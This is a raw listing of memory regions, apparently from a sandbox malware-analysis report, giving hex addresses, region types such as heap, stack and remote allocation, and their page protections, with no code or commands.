312F000
stack
page read and write
23BE0000
trusted library allocation
page read and write
6F2000
heap
page read and write
82C0000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
235BE000
stack
page read and write
23BE0000
trusted library allocation
page read and write
26940000
trusted library allocation
page read and write
25E01000
heap
page read and write
44D000
trusted library allocation
page execute and read and write
26890000
trusted library allocation
page read and write
24F70000
trusted library allocation
page read and write
85B0000
heap
page read and write
23D01000
trusted library allocation
page read and write
24EEE000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
24D48000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
2398E000
stack
page read and write
23BE0000
trusted library allocation
page read and write
57E000
stack
page read and write
24F6D000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
409000
unkown
page write copy
82D0000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
23E16000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
26950000
trusted library allocation
page read and write
23C20000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
23F77000
trusted library allocation
page read and write
2408A000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
23E21000
trusted library allocation
page read and write
24D76000
trusted library allocation
page read and write
23B40000
trusted library allocation
page read and write
23E12000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
2368E000
stack
page read and write
72F0000
heap
page read and write
26950000
trusted library allocation
page read and write
890000
direct allocation
page read and write
401000
unkown
page execute read
870000
direct allocation
page read and write
23C06000
trusted library allocation
page read and write
85D6000
heap
page read and write
23BF0000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
2F70000
heap
page read and write
24E3E000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
26880000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
73C000
heap
page read and write
7750000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
23C20000
trusted library allocation
page read and write
24C89000
trusted library allocation
page read and write
25F80000
heap
page execute and read and write
268A0000
trusted library allocation
page read and write
2840000
heap
page read and write
465000
trusted library allocation
page execute and read and write
23C20000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
30AE000
stack
page read and write
820000
direct allocation
page read and write
407000
unkown
page readonly
268A0000
trusted library allocation
page read and write
25D84000
heap
page read and write
5F1A000
trusted library allocation
page read and write
238C0000
heap
page read and write
6F9000
heap
page read and write
23C20000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
88E0000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
24F0C000
trusted library allocation
page read and write
24D3C000
trusted library allocation
page read and write
23B30000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
2FAA000
heap
page read and write
26890000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
23640000
trusted library allocation
page read and write
268D0000
trusted library allocation
page read and write
23EAE000
trusted library allocation
page read and write
3003000
heap
page read and write
83B5000
trusted library allocation
page read and write
26950000
trusted library allocation
page read and write
26980000
trusted library allocation
page read and write
23B40000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
24EF0000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
23FD3000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
83C7000
trusted library allocation
page read and write
24D68000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
85AC000
heap
page read and write
25DA7000
heap
page read and write
23C30000
trusted library allocation
page execute and read and write
800000
direct allocation
page read and write
23BE0000
trusted library allocation
page read and write
23B30000
trusted library allocation
page read and write
24E05000
trusted library allocation
page read and write
8295000
trusted library allocation
page read and write
746000
heap
page read and write
769D000
stack
page read and write
26890000
trusted library allocation
page read and write
5A0000
heap
page read and write
23D1D000
trusted library allocation
page read and write
26960000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
23C20000
trusted library allocation
page read and write
234FE000
stack
page read and write
761F000
stack
page read and write
26950000
trusted library allocation
page read and write
269A0000
trusted library allocation
page read and write
848E000
stack
page read and write
26890000
trusted library allocation
page read and write
5056000
remote allocation
page execute and read and write
26890000
trusted library allocation
page read and write
409000
unkown
page read and write
25DB6000
heap
page read and write
4F12000
trusted library allocation
page read and write
268A0000
trusted library allocation
page read and write
859C000
heap
page read and write
23C20000
trusted library allocation
page read and write
23B30000
trusted library allocation
page read and write
23CAD000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
4656000
remote allocation
page execute and read and write
23C40000
trusted library allocation
page read and write
24D29000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
23B40000
trusted library allocation
page read and write
26950000
trusted library allocation
page read and write
507000
heap
page read and write
26890000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
268A0000
trusted library allocation
page read and write
400000
unkown
page readonly
23BE1000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
500000
heap
page read and write
26890000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
269A0000
trusted library allocation
page read and write
23C00000
trusted library allocation
page read and write
240B8000
trusted library allocation
page read and write
24DAC000
trusted library allocation
page read and write
268A0000
trusted library allocation
page read and write
4EB1000
trusted library allocation
page read and write
23B30000
trusted library allocation
page read and write
4B00000
direct allocation
page read and write
24EB7000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
2DC0000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
470000
trusted library allocation
page execute and read and write
26890000
trusted library allocation
page read and write
76C0000
trusted library allocation
page read and write
24FBD000
trusted library allocation
page read and write
2E7E000
stack
page read and write
701000
heap
page read and write
23BE0000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
24DED000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
75DE000
stack
page read and write
23BE0000
trusted library allocation
page read and write
8180000
trusted library allocation
page read and write
2E12000
trusted library allocation
page read and write
24D88000
trusted library allocation
page read and write
23C20000
trusted library allocation
page read and write
23E0E000
trusted library allocation
page read and write
73C000
heap
page read and write
23BE0000
trusted library allocation
page read and write
24E0E000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
45A000
trusted library allocation
page execute and read and write
23BE0000
trusted library allocation
page read and write
23990000
trusted library allocation
page read and write
31F8000
heap
page read and write
268A0000
trusted library allocation
page read and write
23C20000
trusted library allocation
page read and write
26970000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
2DDD000
trusted library allocation
page execute and read and write
26890000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
268A0000
trusted library allocation
page read and write
4B0000
heap
page read and write
2DD0000
trusted library allocation
page read and write
400000
unkown
page readonly
23B50000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
24EE2000
trusted library allocation
page read and write
24E10000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
269F0000
trusted library allocation
page read and write
460000
heap
page read and write
20D0000
heap
page read and write
5EB1000
trusted library allocation
page read and write
8590000
heap
page read and write
23CFD000
trusted library allocation
page read and write
268B0000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
8D0000
direct allocation
page read and write
269A0000
trusted library allocation
page read and write
269B0000
trusted library allocation
page read and write
237C0000
remote allocation
page read and write
26950000
trusted library allocation
page read and write
268D0000
trusted library allocation
page read and write
886E000
stack
page read and write
31F0000
heap
page read and write
4A90000
direct allocation
page read and write
26890000
trusted library allocation
page read and write
268A0000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
433000
trusted library allocation
page execute and read and write
76E0000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
7FD90000
trusted library allocation
page execute and read and write
2375E000
stack
page read and write
23C20000
trusted library allocation
page read and write
25D86000
heap
page read and write
24000000
trusted library allocation
page read and write
580000
heap
page read and write
7580000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
23BF0000
trusted library allocation
page read and write
8598000
heap
page read and write
268C0000
trusted library allocation
page read and write
269B0000
trusted library allocation
page read and write
680000
heap
page read and write
24D4C000
trusted library allocation
page read and write
25037000
trusted library allocation
page read and write
7327000
heap
page read and write
23BE0000
trusted library allocation
page read and write
7780000
trusted library allocation
page read and write
2E30000
trusted library allocation
page read and write
8520000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
23B46000
trusted library allocation
page read and write
7720000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
26950000
trusted library allocation
page read and write
8250000
trusted library allocation
page execute and read and write
25F3E000
stack
page read and write
23BE0000
trusted library allocation
page read and write
23C0A000
trusted library allocation
page read and write
24F8F000
trusted library allocation
page read and write
24D30000
trusted library allocation
page read and write
2F6C000
stack
page read and write
23BE0000
trusted library allocation
page read and write
CCE6000
direct allocation
page execute and read and write
24D13000
trusted library allocation
page read and write
19A000
stack
page read and write
23C20000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
268D0000
trusted library allocation
page read and write
2689F000
trusted library allocation
page read and write
23AC6000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
240E6000
trusted library allocation
page read and write
8B0000
heap
page read and write
863A000
heap
page read and write
24CE7000
trusted library allocation
page read and write
269A0000
trusted library allocation
page read and write
23B30000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
717000
heap
page read and write
26980000
trusted library allocation
page read and write
23BF0000
trusted library allocation
page read and write
269A0000
trusted library allocation
page read and write
23C20000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
23C20000
trusted library allocation
page read and write
23E14000
trusted library allocation
page read and write
23C20000
trusted library allocation
page read and write
23B40000
trusted library allocation
page read and write
268D0000
trusted library allocation
page read and write
84CE000
stack
page read and write
24C83000
trusted library allocation
page read and write
23BF0000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
23BE1000
trusted library allocation
page read and write
24CEA000
trusted library allocation
page read and write
6E8000
heap
page read and write
26890000
trusted library allocation
page read and write
24F6A000
trusted library allocation
page read and write
2850000
heap
page read and write
2D0E000
stack
page read and write
238AA000
stack
page read and write
2F78000
heap
page read and write
24D43000
trusted library allocation
page read and write
2683E000
stack
page read and write
4B50000
heap
page execute and read and write
83C0000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
4AC0000
direct allocation
page read and write
840000
direct allocation
page read and write
23BF0000
trusted library allocation
page read and write
7856000
remote allocation
page execute and read and write
23BE0000
trusted library allocation
page read and write
24DA5000
trusted library allocation
page read and write
23CD7000
trusted library allocation
page read and write
23B30000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
23B40000
trusted library allocation
page read and write
73C000
heap
page read and write
407000
unkown
page readonly
23C20000
trusted library allocation
page read and write
2F9E000
heap
page read and write
31A5000
heap
page execute and read and write
456000
trusted library allocation
page execute and read and write
26890000
trusted library allocation
page read and write
24FCF000
trusted library allocation
page read and write
23D0D000
trusted library allocation
page read and write
72DE000
stack
page read and write
26890000
trusted library allocation
page read and write
82F0000
trusted library allocation
page read and write
24CC9000
trusted library allocation
page read and write
23CB9000
trusted library allocation
page read and write
23B40000
trusted library allocation
page read and write
420000
trusted library allocation
page read and write
There are 972 hidden memdumps, click here to show them.